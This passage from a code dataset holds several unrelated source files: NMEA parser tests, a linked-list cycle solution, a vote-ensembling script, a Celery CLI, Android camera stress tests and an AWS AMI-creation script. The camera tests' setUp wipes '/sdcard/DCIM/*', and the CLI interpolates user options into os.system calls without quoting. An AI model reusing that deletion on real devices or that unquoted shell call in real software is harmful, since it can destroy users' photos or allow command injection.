parsing of serialized message reproduces original message\r\n res1 = self.msgGLL\r\n res2 = NMEAReader.parse(self.msgGLL.serialize())\r\n self.assertEqual(str(res1), str(res2))\r\n\r\n def testStrP(self):\r\n res1 = self.msgPUBX00\r\n res2 = NMEAReader.parse(self.msgPUBX00.serialize())\r\n self.assertEqual(str(res1), str(res2))\r\n\r\n def testNomVal(self):\r\n for att in ('CH', 'ST', 'LA', 'LN'):\r\n res = NMEAMessage.nomval(att)\r\n self.assertEqual(res, \"\")\r\n res = NMEAMessage.nomval('HX')\r\n self.assertEqual(res, 0)\r\n res = NMEAMessage.nomval('IN')\r\n self.assertEqual(res, 0)\r\n res = NMEAMessage.nomval('DE')\r\n self.assertEqual(res, 0.0)\r\n res = NMEAMessage.nomval('TM')\r\n self.assertIsInstance(res, datetime.time)\r\n res = NMEAMessage.nomval('DT')\r\n self.assertIsInstance(res, datetime.date)\r\n\r\n def testNomValBAD(self):\r\n EXPECTED_ERROR = \"Unknown attribute type XX.\"\r\n with self.assertRaises(NMEATypeError) as context:\r\n NMEAMessage.nomval('XX')\r\n self.assertTrue(EXPECTED_ERROR in str(context.exception))\r\n\r\n def testVal2Str(self):\r\n for att in ('CH', 'ST'):\r\n res = NMEAMessage.val2str(\"AB\", att)\r\n self.assertEqual(res, \"AB\")\r\n res = NMEAMessage.val2str(15, 'HX')\r\n self.assertEqual(res, '0F')\r\n res = NMEAMessage.val2str(23, 'IN')\r\n self.assertEqual(res, '23')\r\n res = NMEAMessage.val2str(15.286, 'DE')\r\n self.assertEqual(res, '15.286')\r\n res = NMEAMessage.val2str(55.5, 'LA')\r\n self.assertEqual(res, \"5530.00000\")\r\n res = NMEAMessage.val2str(2.75, 'LN')\r\n self.assertEqual(res, \"00245.00000\")\r\n res = NMEAMessage.val2str(datetime.datetime(2021, 5, 7, 2, 45, 23), 'TM')\r\n self.assertEqual(res, '024523.00')\r\n res = NMEAMessage.val2str(datetime.datetime(2020, 6, 7, 3, 27, 24), 'DT')\r\n self.assertEqual(res, '070620')\r\n\r\n def testVal2StrBAD(self):\r\n EXPECTED_ERROR = \"Unknown attribute type XX.\"\r\n with self.assertRaises(NMEATypeError) as context:\r\n NMEAMessage.val2str(23.45, 'XX')\r\n self.assertTrue(EXPECTED_ERROR in str(context.exception))\r\n\r\n#*******************************************\r\n# NMEAMessage magic methods\r\n#*******************************************\r\n\r\n def testReprS(self):\r\n res = repr(self.msgGLL)\r\n self.assertEqual(res, \"NMEAMessage('GN','GLL', 0, payload=['5327.04319', 'S', '00214.41396', 'E', '223232.00', 'A', 'A'])\")\r\n\r\n def testReprP(self):\r\n res = repr(self.msgPUBX00)\r\n self.assertEqual(res, \"NMEAMessage('P','UBX', 0, payload=['00', '103607.00', '5327.03942', 'N', '00214.42462', 'W', '104.461', 'G3', '29', '31', '0.085', '39.63', '-0.007', '', '5.88', '7.62', '8.09', '6', '0', '0'])\")\r\n\r\n def testEvalReprS(self): # double check that evaluation of repr(message) reproduces original message\r\n res1 = self.msgGLL\r\n res2 = eval(repr(self.msgGLL))\r\n self.assertEqual(str(res1), str(res2))\r\n\r\n def testEvalReprP(self):\r\n res1 = self.msgPUBX00\r\n res2 = eval(repr(self.msgPUBX00))\r\n self.assertEqual(str(res1), str(res2))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # import sys;sys.argv = ['', 'Test.testName']\r\n unittest.main()\r\n","sub_path":"tests/test_static.py","file_name":"test_static.py","file_ext":"py","file_size_in_byte":10678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"365483468","text":"# -*- encoding: utf-8 -*-\n\n\n\"\"\"\n@File : letcode_142_环形链表 II.py\n@Time : 2020/10/10 上午9:17\n@Author : dididididi\n@Email : \n@Software: PyCharm\n\"\"\"\n\nclass ListNode(object):\n def 
__init__(self, x):\n        self.val = x\n        self.next = None\n\nclass Solutions(object):\n    \"\"\"\n    Two-pointer (fast/slow) solution; the math behind it is neat:\n    a + (n + 1)b + nc = 2(a + b)\n    => a = c + (n - 1)(b + c)\n    where a = head-to-entry distance, b = entry-to-meeting distance,\n    c = meeting-point-back-to-entry distance, n = full laps of the fast pointer\n    \"\"\"\n    def detectCycle(self, head):\n        \"\"\"\n        :type head: ListNode\n        :rtype: ListNode\n        \"\"\"\n        p1 = p2 = head\n        while p2 and p2.next:\n            p1 = p1.next\n            p2 = p2.next.next\n            if p1 == p2:\n                p = head\n                while p1 != p:\n                    p = p.next\n                    p1 = p1.next\n                return p\n        return None\n\n\nclass Solution(object):\n    \"\"\"\n    Hash-set solution; using a hash set here almost feels like cheating.\n    With a cycle we are bound to revisit a node; without one we walk to None.\n    \"\"\"\n    def detectCycle(self, head):\n        \"\"\"\n        :type head: ListNode\n        :rtype: ListNode\n        \"\"\"\n        visited = set()\n        while head:\n            if head in visited:\n                return head\n            visited.add(head)\n            head = head.next\n        return None\n\n\n
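# Note (added): a quick numeric check of the derivation above, on a hypothetical\n# list 1 -> 2 -> 3 -> 4 -> 5 -> (back to 3), whose cycle entry is node 3:\n#   a = 2 (head to entry); the pointers first meet at node 4, so b = 1, c = 2.\n#   With n = 1, a = c + (n - 1)(b + c) = 2, so one walker from the head and one\n#   from the meeting point, stepping in lockstep, meet exactly at entry node 3.\n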
if __name__ == '__main__':\n    head = ListNode(3)\n    head.next = ListNode(2)\n    head.next.next = ListNode(0)\n    head.next.next.next = ListNode(-4)\n    # head.next.next.next.next = head.next.next\n    sol = Solution()\n    print(sol.detectCycle(head))","sub_path":"letcode_142_环形链表 II.py","file_name":"letcode_142_环形链表 II.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
{"seq_id":"427325676","text":"########## hard vote over results 1-4\n\nimport pandas as pd\nimport numpy as np\nimport os\nfrom pprint import pprint\nDATA_DIR = '../data/'\nfiles = os.listdir(DATA_DIR)\nfiles = [i for i in files if i[0]!='.']\nprint(len(files))\npprint(files)\n\nsub_exp_df = pd.read_csv('../submit_example.csv')\ndf_merged = sub_exp_df.drop(['label'], axis=1)\n# df_merged = pd.read_csv(DATA_DIR + files[0])\nfor file in files:\n    tmp_df = pd.read_csv(DATA_DIR + file)\n    df_merged = df_merged.merge(tmp_df, how='left', on='id')\n    print(df_merged.shape)\npprint(df_merged.head(10))\n\ndef work(pres):\n    count = [0,0,0]\n    for i in pres:\n        count[i] += 1\n    out = count.index(max(count))\n    return out\n\ntmp_arr = np.array(df_merged.iloc[:,1:])\nlabel_voted = [work(line) for line in tmp_arr]\n\ndf_summit = df_merged[['id']]\n\ndf_summit['label'] = label_voted\n\nSUMMIT_DIR = '../submit/'\ndf_summit[['id','label']].to_csv(SUMMIT_DIR + 'result_2.csv',index=False)\nprint(df_summit.shape)\n\n### test helper: diff two result files\ndef diff_df(fname1, fname2):\n    sub_exp_df = pd.read_csv('../submit_example.csv')\n    df_3 = sub_exp_df.drop(['label'], axis=1)\n\n    df_1 = pd.read_csv(fname1)\n    df_2 = pd.read_csv(fname2)\n\n    df_3 = df_3.merge(df_1, how='left', on='id')\n    df_3 = df_3.merge(df_2, how='left', on='id')\n    print(df_3.shape)\n    df_diff = df_3[df_3['label_x'] != df_3['label_y']]\n    print(df_diff.shape)\n    return df_diff\n\n\n","sub_path":"combine/src/vote001.py","file_name":"vote001.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
{"seq_id":"365623613","text":"import os\nimport sys\n\nimport click\nimport shutil\n\nCURRENT_DIR = os.path.abspath(os.path.dirname(__file__))\nSOURCE_DIR = CURRENT_DIR\nDEPLOY_DIR = os.path.join(CURRENT_DIR, \"deploy\")\nTEMPLATE_DIR = os.path.join(CURRENT_DIR, \"template\")\nTEST_DIR = os.path.join(CURRENT_DIR, \"test\")\nSUB_TESTS_DIRS = [item for item in os.listdir(TEST_DIR)\n                  if os.path.isdir(os.path.join(TEST_DIR, item))]\n\nPROJECT_DIR = os.path.join(os.getcwd(), \"project\")\nif os.path.exists(PROJECT_DIR):\n    APP_DIRS = [item for item in os.listdir(PROJECT_DIR)\n                if os.path.isdir(os.path.join(PROJECT_DIR, item))\n                and not item.startswith(\"_\")]\n\n\n@click.group()\ndef oshe():\n    pass\n\n\n@oshe.command()\ndef init():\n    project_dir = os.path.join(os.getcwd(), \"project\")\n    if os.path.exists(project_dir):\n        click.echo(\"Project is already initialized, exiting...\")\n    else:\n        click.echo(\"No project folder is found, initializing project template\")\n        os.makedirs(project_dir)\n        shutil.copy(os.path.join(TEMPLATE_DIR, \"config.py\"), project_dir)\n        shutil.copy(os.path.join(TEMPLATE_DIR, \"celery_app.py\"), project_dir)\n\n        click.echo(\"creating demo app\")\n        app_dir = os.path.join(project_dir, \"demo\")\n        shutil.copytree(os.path.join(TEMPLATE_DIR, \"demo\"), app_dir)\n\n\n@oshe.command()\n@click.argument(\"name\")\ndef create(name):\n    if os.path.exists(PROJECT_DIR):\n        app_dir = os.path.join(PROJECT_DIR, name)\n        if not os.path.exists(app_dir):\n            click.echo(\"creating app: %s\" % name)\n            shutil.copytree(os.path.join(TEMPLATE_DIR, \"demo\"), app_dir)\n        else:\n            click.echo(\"app [%s] already exists, exiting... \" % name)\n    else:\n        click.echo(\"No project folder is found, you have to initialize project first\")\n\n\n@oshe.command()\n@click.argument(\"environment\", type=click.Choice([\"internal\", \"staging\", \"production\"]))\ndef deploy(environment):\n    click.echo(\"deploying to: %s\" % environment)\n\n\n@oshe.command()\n@click.option(\"queue\", \"-Q\", help=\"queue to run\", default=\"all\")\n@click.option(\"loglevel\", \"-L\", help=\"log level to run with\", default=\"info\")\ndef worker(queue, loglevel):\n    click.echo(\"starting celery...\")\n    python_bin_dir = os.path.dirname(sys.executable)\n    celery_path = os.path.join(python_bin_dir, \"celery\")\n    if queue != \"all\":\n        os.system(\"%s -A project.celery_app:celery_app worker -Q %s -l %s\" % (celery_path, queue, loglevel))\n    else:\n        os.system(\"%s -A project.celery_app:celery_app worker -l %s\" % (celery_path, loglevel))\n\n\n@oshe.command()\ndef beat():\n    python_bin_dir = os.path.dirname(sys.executable)\n    celery_path = os.path.join(python_bin_dir, \"celery\")\n    os.system(\"%s -A project.celery_app:celery_app beat\" % celery_path)\n\n\n@oshe.command()\n@click.argument(\"type\", type=click.Choice(SUB_TESTS_DIRS))\n@click.option(\"suit\", \"--suit\", default=\"all\")\ndef test(type, suit):\n    click.echo(\"testing %s.%s\" % (type, suit))\n\n\nif __name__ == \"__main__\":\n    oshe()\n","sub_path":"oshe/oshe.py","file_name":"oshe.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
{"seq_id":"112616821","text":"#!/usr/bin/python\n# coding:utf-8\n\nfrom devicewrapper.android import device as d\nimport unittest\nimport string\nimport time\nimport util\nimport random\n\na = util.Adb()\nsm = util.SetCaptureMode()\ntb = util.TouchButton()\nso = util.SetOption()\n\n#Written by XuGuanjun\n\nPACKAGE_NAME = 'com.intel.camera22'\nACTIVITY_NAME = PACKAGE_NAME + '/.Camera'\n\n\nSD =['4','false']\nHD =['5','false']\nHSD =['5','true']\nHFD =['6','false']\nHSFD =['6','true']\nCAMERAMODE_LIST = ['Depth Snapshot','Single','Video','Panorama','Burst','Perfect Shot']\nFLASH_MODE =['on','off','auto']\nSCENE_MODE =['auto','landscape','portrait','night','sports'] #'night-portrait'\nEXPOSURE_MODE = ['-6','-3','0','3','6']\nPICTURESIZE_MODE =['WideScreen','StandardScreen']\nVIDEOSIZE_MODE = [['false','4'],['false','5'],['true','5'],['false','6'],['true','6']]\n\n# PATH\nPATH ='/data/data/com.intel.camera22/shared_prefs/com.intel.camera22_preferences_0_0.xml '\n# key\nPICTURE_SIZE_KEY ='| grep pref_camera_picture_size_key'\n\nclass CameraTest(unittest.TestCase):\n    def setUp(self):\n        
super(CameraTest,self).setUp()\n #Delete all image/video files captured before\n a.cmd('rm','/sdcard/DCIM/*')\n #Refresh media after delete files\n a.cmd('refresh','/sdcard/DCIM/*')\n #Launch social camera\n self._launchCamera()\n\n def tearDown(self):\n #ad.cmd('pm','com.intel.camera22') #Force reset the camera settings to default\n self._pressBack(4)\n super(CameraTest,self).tearDown()\n a.cmd('pm','com.intel.camera22')\n \n # Test case 1\n def testSwitchMode50Times(self):\n \"\"\"\n Summary:testswitchmode50times: test switch mode 50 times\n Steps: \n 1.Launch single capture activity\n 2.Switch camera mode 50 times\n 3.Exit activity\n \"\"\"\n sm.switchCaptureMode('Single')\n for i in range(50):\n mode = random.choice(CAMERAMODE_LIST)\n sm.switchCaptureMode(mode)\n\n # Test case 2\n def testLaunchCamera50Times(self):\n \"\"\"\n Summary:testlaunchcamera50times: Launch camera 50 times\n Steps: \n 1.Launch single capture activity\n 2.Repeat 50 times\n 3.Exit activity\n \"\"\"\n sm.switchCaptureMode('Single')\n for i in range(50):\n self._pressBack(4)\n a.cmd('launch','com.intel.camera22/.Camera')\n assert d(resourceId = 'com.intel.camera22:id/shutter_button').wait.exists(timeout=1000),'Launch camera failed!!'\n\n # Test case 3\n def testSwitchBackFrontCameraInSingleMode30Times(self):\n \"\"\"\n Summary:SwitchBack/Frontcamerainsinglemode30times: Switch Back/Front camera in each mode 30 times\n Steps: \n 1.Launch single capture activity\n 2.Switch Back/Front camera in single mode 30 times\n 3.Exit activity\n \"\"\"\n sm.switchCaptureMode('Single')\n for i in range(30):\n tb.switchBackOrFrontCamera('front')\n tb.switchBackOrFrontCamera('back')\n time.sleep(1)\n\n # Test case 4\n def testChangeFlashMode100Times(self):\n \"\"\"\n Summary:testChangeflashmode100times: Change flash mode 100 times\n Steps: \n 1.Launch single capture activity\n 2.Change flash mode 100 times\n 3.Exit activity\n \"\"\"\n sm.switchCaptureMode('Single')\n for i in range(100):\n flash_mode = random.choice(FLASH_MODE)\n so.setCameraOption('Flash',flash_mode)\n\n # Test case 5\n def testChangeSceneMode100Times(self):\n \"\"\"\n Summary:testChangescenemode100times: Change scene mode 100 times\n Steps: \n 1.Launch single capture activity\n 2.Change scene mode 100 times\n 3.Exit activity\n \"\"\"\n sm.switchCaptureMode('Single')\n for i in range(100):\n scene_mode = random.choice(SCENE_MODE)\n so.setCameraOption('Scenes',scene_mode)\n\n # Test case 6\n def testChangeExposureMode100Times(self):\n \"\"\"\n Summary:testChangeexposuremode100times: Change exposure mode 100 times\n Steps: \n 1.Launch single capture activity\n 2.Change exposure mode 100 times\n 3.Exit activity\n \"\"\"\n sm.switchCaptureMode('Single')\n for i in range(100):\n exposure_mode = random.choice(EXPOSURE_MODE)\n so.setCameraOption('Exposure',exposure_mode)\n\n\n\n # Test case 7\n def testChangePictureSizeMode100Times(self):\n \"\"\"\n Summary:testChangepicturesizemode100times: Change picture size mode 100 times\n Steps: \n 1.Launch single capture activity\n 2.Change picture size 100 times\n 3.Exit activity\n \"\"\"\n sm.switchCaptureMode('Single')\n for i in range(100):\n size_mode = random.choice(PICTURESIZE_MODE)\n so.setCameraOption('Picture Size',size_mode)\n\n #Test case 8\n def testChangeVideoSizeMode100Times(self):\n \"\"\"\n Summary:testChangevideosizemode100times: Change video size mode 100 times\n Steps: \n 1.Launch single capture activity\n 2.Change video size 100 times\n 3.Exit activity\n \"\"\"\n sm.switchCaptureMode('Video')\n for i in 
range(100):\n size_mode = random.choice(VIDEOSIZE_MODE)\n so.setCameraOption('Video Size',size_mode)\n\n\n #case 9\n def testEnterGalleryFromGalleryPreviewThumbnail100times(self):\n '''\n Summary: enter gallery from gallery preview thumbnail 100times\n Steps : 1.Launch single capture activity\n 2.enter gallery from gallery preview thumbnail 100times\n 3.Exit activity\n '''\n for i in range(100):\n time.sleep(3)\n tb.captureAndCheckPicCount('single',2) # capture picture\n time.sleep(1) \n d(resourceId = 'com.intel.camera22:id/thumbnail').click.wait() # enter gallery\n time.sleep(2)\n # step 2\n d.click(1200,800)\n time.sleep(1)\n assert d(resourceId = 'android:id/home').wait.exists(timeout = 3000)\n self._pressBack(1)\n\n\n\n #case 10\n def testCaptureSingleImage500timesBackCamera(self):\n '''\n Summary: Capture single image 500 times\n Steps : 1.Launch single capture activity\n 2.Capture single image 500 times\n 3.Exit activity\n '''\n for i in range(500):\n tb.captureAndCheckPicCount('single',2)\n\n #case 11\n def testCaptureSingleImage500timesFrontCamera(self):\n '''\n Summary: Capture single image 500 times\n Steps : 1.Launch single capture activity\n 2.Capture single image 500 times\n 3.Exit activity\n '''\n tb.switchBackOrFrontCamera('front') #Force set camera to front\n for i in range(500):\n tb.captureAndCheckPicCount('single',2)\n tb.switchBackOrFrontCamera('back')\n \n #case 12\n def testCaptureHdrImage500timesBackCamera(self):\n '''\n Summary: Capture hdr image 500 times\n Steps : 1.Launch hdr capture activity\n 2.Capture hdr image 500 times\n 3.Exit activity\n '''\n sm.switchCaptureMode('Single','HDR')\n for i in range(500):\n tb.captureAndCheckPicCount('single',5)\n\n #case 13\n def testCaptureSmileImage500timesBackCamera(self):\n '''\n Summary: Capture smile image 500 times\n Steps : 1.Launch smile capture activity\n 2.Capture smile image 500 times\n 3.Exit activity\n '''\n sm.switchCaptureMode('Single','Smile')\n for i in range(500):\n tb.captureAndCheckPicCount('smile',2)\n\n #case 14\n def testRecord1080PVideo500times(self):\n '''\n Summary: test Record 1080P video 500 times\n Steps : 1.Launch video capture activity\n 2.Record 1080P video 500 times\n 3.Exit activity\n '''\n sm.switchCaptureMode('Video')\n for i in range(500):\n tb.captureAndCheckPicCount('video',5)\n\n #case 15\n def testRecordVideo500timesFrontCamera(self):\n '''\n Summary: test Record video 500 times\n Steps : 1.Launch video capture activity\n 2.Change to front camera\n 3.Record video 500 times\n 4.Exit activity\n '''\n sm.switchCaptureMode('Video')\n tb.switchBackOrFrontCamera('front')\n for i in range(500):\n tb.captureAndCheckPicCount('video',5)\n tb.switchBackOrFrontCamera('back')\n\n # Test case 18\n def testCapturePerectshotImage200TimesBackCamera(self):\n \"\"\"\n Summary:testCaptureperfectshotimage200times: Capture perfect shot image 200 times\n Steps: 1.Launch perfectshot capture activity\n 2.Capture perfectshot image 200 times\n 3.Exit activity\n \"\"\"\n #step 1\n sm.switchCaptureMode('Perfect Shot')\n #step 2 \n for i in range(200):\n tb.captureAndCheckPicCount('single',5)\n time.sleep(2)\n\n\n # Test case 19\n def testCapturePanoramaImage200TimesBackCamera(self):\n \"\"\"\n Summary:testCapturepanoramaimage200times: Capture panorama image 200 times\n Steps: 1.Launch panorama capture activity\n 2.Capture panorama image 200 times\n 3.Exit activity\n \"\"\"\n #step 1\n sm.switchCaptureMode('Panorama')\n #step 2\n for i in range(200):\n tb.captureAndCheckPicCount('smile',3)\n time.sleep(1)\n\n\n\n 
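# Note (added): these stress cases all share one shape; a hypothetical helper\n    # (not part of the original suite) that the loop bodies above could reuse:\n    #\n    #     def _stress(self, mode, kind, count, repeats):\n    #         sm.switchCaptureMode(mode)\n    #         for _ in range(repeats):\n    #             # 'count' mirrors the literal 2/3/5 passed above; its exact\n    #             # meaning lives in the project's util module\n    #             tb.captureAndCheckPicCount(kind, count)\n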
# Test case 20\n def testCaptureSingleImage8M500TimesBackCamera(self):\n \"\"\"\n capture single image 500 times\n 8M pixels, back camera\n\n \"\"\"\n #step 1\n sm.switchCaptureMode('Single')\n so.setCameraOption('Picture Size','StandardScreen')\n #step 2\n tb.switchBackOrFrontCamera('back')\n #step 3\n for i in range(500):\n tb.captureAndCheckPicCount('single',3)\n time.sleep(1)\n \n\n\n # Test case 21\n def testcaseCaptureSmileImage8M500TimesBackCamera(self):\n \"\"\"\n Capture Smile Image 8M 500 times back camera\n 8M pixels, back camera\n \"\"\"\n #step 1\n sm.switchCaptureMode('Single','Smile')\n so.setCameraOption('Picture Size','StandardScreen')\n #step 2\n tb.switchBackOrFrontCamera('back')\n #step 3\n for i in range(500):\n tb.captureAndCheckPicCount('smile',3)\n time.sleep(1)\n\n\n # Test Case 22\n def testcaseRecord720PVideo500Times(self):\n\n \"\"\"\n Record 720P Video 500times\n Video size 720P\n \"\"\"\n #step 1\n sm.switchCaptureMode('Video')\n so.setCameraOption('Video Size',['false','5'])\n #step 2 \n for i in range (500):\n tb.captureAndCheckPicCount('video',3)\n time.sleep(1) \n\n\n # Test Case 23\n def testcaseRecord480PVideo500Times(self):\n \"\"\"\n test case Record 480 Pvideo 500 times\n Video size 480P\n\n \"\"\"\n #step 1\n sm.switchCaptureMode('Video')\n so.setCameraOption('Video Size',['false','4'])\n #step 2 \n for i in range (500):\n tb.captureAndCheckPicCount('video',3)\n time.sleep(1) \n\n\n # Test Case 24\n def testcaseBurstImage8M200Times(self):\n \"\"\"\n test case Burst Image 200 times\n 8M pixels, back camera\n \"\"\"\n\n #step 1\n sm.switchCaptureMode('Burst','Fast')\n so.setCameraOption('Picture Size','StandardScreen')\n #step 2 \n tb.switchBackOrFrontCamera('back')\n #step 3\n for i in range(200):\n tb.captureAndCheckPicCount('single',5)\n time.sleep(1)\n \n # Test Case 25\n def testCaptureDepthImage500Times(self):\n \"\"\"\n test case Depth Image 500 times\n back camera\n \"\"\"\n\n #step 1\n sm.switchCaptureMode('Depth Snapshot')\n time.sleep(10)\n #step 2\n for i in range(500):\n tb.captureAndCheckPicCount('single',2)\n time.sleep(1)\n\n # Test Case 26\n def testSwitchDepthToSingle100Times(self):\n \"\"\"\n test Switch Depth mode to Single mode 100 times\n back camera\n \"\"\"\n for i in range(100):\n sm.switchCaptureMode('Depth Snapshot')\n time.sleep(10)\n sm.switchCaptureMode('Single')\n time.sleep(2)\n\n # Test Case 27\n def testCaptureDepthImageThenHDRImage100Times(self):\n \"\"\"\n test capture depth image and then capture HDR image 100 times.\n back camera\n \"\"\"\n for i in range(100):\n sm.switchCaptureMode('Depth Snapshot')\n time.sleep(10)\n tb.captureAndCheckPicCount('single',2)\n sm.switchCaptureMode('Single','HDR')\n tb.captureAndCheckPicCount('single',2)\n time.sleep(2)\n\n # Test Case 28\n def testCaptureDepthImageThenSmileImage100Times(self):\n \"\"\"\n test capture depth image and then capture smile image 100 times.\n back camera\n \"\"\"\n for i in range(100):\n sm.switchCaptureMode('Depth Snapshot')\n time.sleep(10)\n tb.captureAndCheckPicCount('single',2)\n sm.switchCaptureMode('Single','Smile')\n tb.captureAndCheckPicCount('smile',2)\n time.sleep(2)\n\n # Test Case 29\n def testCaptureDepthImageThenTakeVideo100Times(self):\n \"\"\"\n test capture depth image and then take video 100 times.\n back camera\n \"\"\"\n for i in range(100):\n sm.switchCaptureMode('Depth Snapshot')\n time.sleep(10)\n tb.captureAndCheckPicCount('single',2)\n sm.switchCaptureMode('Video')\n tb.captureAndCheckPicCount('video',3)\n time.sleep(2)\n\n # 
Test Case 30\n    def testCaptureDepthImageThenBurstImage100Times(self):\n        \"\"\"\n        test capture depth image and then capture burst image 100 times.\n        back camera\n        \"\"\"\n        for i in range(100):\n            sm.switchCaptureMode('Depth Snapshot')\n            time.sleep(10)\n            tb.captureAndCheckPicCount('single',2)\n            sm.switchCaptureMode('Burst','Fast')\n            tb.captureAndCheckPicCount('single',2)\n            time.sleep(2)\n\n    # Test Case 31\n    def testCaptureDepthImageThenPanoramaImage100Times(self):\n        \"\"\"\n        test capture depth image and then capture panorama image 100 times.\n        back camera\n        \"\"\"\n        for i in range(100):\n            sm.switchCaptureMode('Depth Snapshot')\n            time.sleep(10)\n            tb.captureAndCheckPicCount('single',2)\n            sm.switchCaptureMode('Panorama')\n            tb.captureAndCheckPicCount('smile',2)\n            time.sleep(2)\n\n    # Test Case 32\n    def testCaptureDepthImageThenPerfectshotImage100Times(self):\n        \"\"\"\n        test capture depth image and then capture perfect shot image 100 times.\n        back camera\n        \"\"\"\n        for i in range(100):\n            sm.switchCaptureMode('Depth Snapshot')\n            time.sleep(10)\n            tb.captureAndCheckPicCount('single',2)\n            sm.switchCaptureMode('Perfect Shot')\n            tb.captureAndCheckPicCount('single',2)\n            time.sleep(2)\n\n############################################################################################################\n##############################################################################################################\n\n\n    def _launchCamera(self):\n        d.start_activity(component = ACTIVITY_NAME)\n        time.sleep(2)\n        if d(text = 'Skip').wait.exists(timeout = 2000):\n            d(text = 'Skip').click.wait()\n        #When it is the first time to launch camera there will be a dialog to ask user 'remember location', so need to check\n        if d(text = 'OK').wait.exists(timeout = 2000):\n            d(text = 'OK').click.wait()\n        assert d(resourceId = 'com.intel.camera22:id/mode_button').wait.exists(timeout = 3000), 'Launch camera failed in 3s'\n\n    def _pressBack(self,touchtimes=1):\n        for i in range(touchtimes):\n            d.press('back')\n\n","sub_path":"script/stress.py","file_name":"stress.py","file_ext":"py","file_size_in_byte":16422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
{"seq_id":"37839345","text":"#!/usr/bin/python3\nimport boto3\nimport collections\nimport datetime\nimport time\nfrom sys import argv\nimport smtplib\n\n\nhtmldoc = ''\nhtmldoc += \"<table border='1'><tr><th colspan='2'>Provided Input Details</th></tr>\"\nhtmldoc += \"<tr><td>Instance IP</td><td>{0}</td></tr>\".format(argv[1])\nhtmldoc += \"<tr><td>AMI Name</td><td>{0}</td></tr>\".format(argv[2])\nhtmldoc += \"<tr><td>AMI Description</td><td>{0}</td></tr>\".format(argv[3])\nhtmldoc += \"<tr><td>Launch Configuration Name</td><td>{0}</td></tr>\".format(argv[4])\nhtmldoc += \"<tr><td>ASG Name</td><td>{0}</td></tr>\".format(argv[5])\n\nDate = time.strftime(\"%B-%d-%Y\")\nTime = time.strftime(\"%H:%M:%S\")\ninstance_ip = \"{0}\".format(argv[1])\nami_name = \"{0}\".format(argv[2])\nami_description = \"{0} created on {1}\".format(argv[3], Date)\nlc_name = \"{0}\".format(argv[4])\nasg_name = \"{0}\".format(argv[5])\n\n\n\ndef get_image_details_on_available(image_id):\n    try:\n        available = 0\n        while available == 0:\n            print(\"AMI Not created yet.. Checking again in 15 seconds.\")\n            time.sleep(15)\n            image = ec2client.describe_images(ImageIds=[image_id])\n            if image['Images'][0]['State'] == 'available':\n                available = 1\n        if available == 1:\n            print(\"AMI is now available for use.\")\n        return image\n    except Exception as e:\n        return e\n\n\nec2client = boto3.client('ec2')\nec2resource = boto3.resource('ec2')\nasgclient = boto3.client('autoscaling')\ninstances = ec2resource.instances.filter(\n    Filters=[{'Name': 'instance-state-name', 'Values': ['running']},\n             {'Name': 'ip-address', 'Values': [instance_ip]}])\n\nfor instance in instances:\n    inst_id = instance.id\n    inst_type = instance.instance_type\n    inst_pub_ip = instance.public_ip_address\n    htmldoc += \"<tr><th colspan='2'>Instance Details</th></tr>\"\n    htmldoc += \"<tr><td>Instance ID</td><td>{0}</td></tr>\".format(inst_id)\n    htmldoc += \"<tr><td>Instance Type</td><td>{0}</td></tr>\".format(inst_type)\n    htmldoc += \"<tr><td>Instance IP</td><td>{0}</td></tr>\".format(inst_pub_ip)\n    # create the AMI from this instance, then poll until it becomes available\n    response = ec2client.create_image(\n        InstanceId=inst_id,\n        Name=ami_name,\n        Description=ami_description,\n    )\n    print(\"AMI ID : {0}\".format(response['ImageId']))\n    img = get_image_details_on_available(response['ImageId'])\n\n    #For specific ImageID\n    #imgid = \"ami-XYZ\"\n    #img = get_image_details_on_available(imgid)\n    \n    if isinstance(img, dict):\n        htmldoc += \"<tr><th colspan='2'>AMI Details</th></tr>\"\n        htmldoc += \"<tr><td>AMI ID</td><td>{0}</td></tr>\".format(response['ImageId'])\n        htmldoc += \"<tr><td>Snapshot ID</td><td>{0}</td></tr>\".format(\n            img['Images'][0]['BlockDeviceMappings'][0]['Ebs']['SnapshotId'])\n        htmldoc += \"<tr><td>Device Name</td><td>{0}</td></tr>\".format(\n            img['Images'][0]['BlockDeviceMappings'][0]['DeviceName'])\n        htmldoc += \"<tr><td>Volume Type</td><td>{0}</td></tr>\".format(\n            img['Images'][0]['BlockDeviceMappings'][0]['Ebs']['VolumeType'])\n        htmldoc += \"<tr><td>Volume Size</td><td>{0}</td></tr>\".format(\n            img['Images'][0]['BlockDeviceMappings'][0]['Ebs']['VolumeSize'])\n        htmldoc += \"<tr><td>Delete on Termination</td><td>{0}</td></tr>\".format(\n            img['Images'][0]['BlockDeviceMappings'][0]['Ebs']\n            ['DeleteOnTermination'])\n\n        #lc = asgclient.create_launch_configuration(\n        #    LaunchConfigurationName=lc_name,\n        #    ImageId=response['ImageId'],\n        #    InstanceId=inst_id)\n\n        lcdesc = asgclient.describe_launch_configurations(\n            LaunchConfigurationNames=[lc_name])\n        lcs = lcdesc['LaunchConfigurations']\n        for i in range(len(lcs)):\n            htmldoc += \"<tr><th colspan='2'>Launch Configuration Details</th></tr>\"\n            htmldoc += \"<tr><td>Launch Configuration Name</td><td>{0}</td></tr>\".format(lcs[i]['LaunchConfigurationName'])\n            htmldoc += \"<tr><td>Image Id</td><td>{0}</td></tr>\".format(lcs[i]['ImageId'])\n            htmldoc += \"<tr><td>Key Name</td><td>{0}</td></tr>\".format(lcs[i]['KeyName'])\n            htmldoc += \"<tr><td>Instance Type</td><td>{0}</td></tr>\".format(lcs[i]['InstanceType'])\n            htmldoc += \"<tr><td>Create Time</td><td>{0}</td></tr>\".format(lcs[i]['CreatedTime'])\n            htmldoc += \"<tr><td>EBS Optimized</td><td>{0}</td></tr>\".format(lcs[i]['EbsOptimized'])\n            sgs = lcs[i]['SecurityGroups']\n            for l in range(len(sgs)):\n                htmldoc += \"<tr><td>Security Group</td><td>{0}</td></tr>\".format(sgs[l])\n            bdm = lcs[i]['BlockDeviceMappings']\n            for m in range(len(bdm)):\n                htmldoc += \"<tr><td>Device Name</td><td>{0}</td></tr>\".format(bdm[m]['DeviceName'])\n                htmldoc += 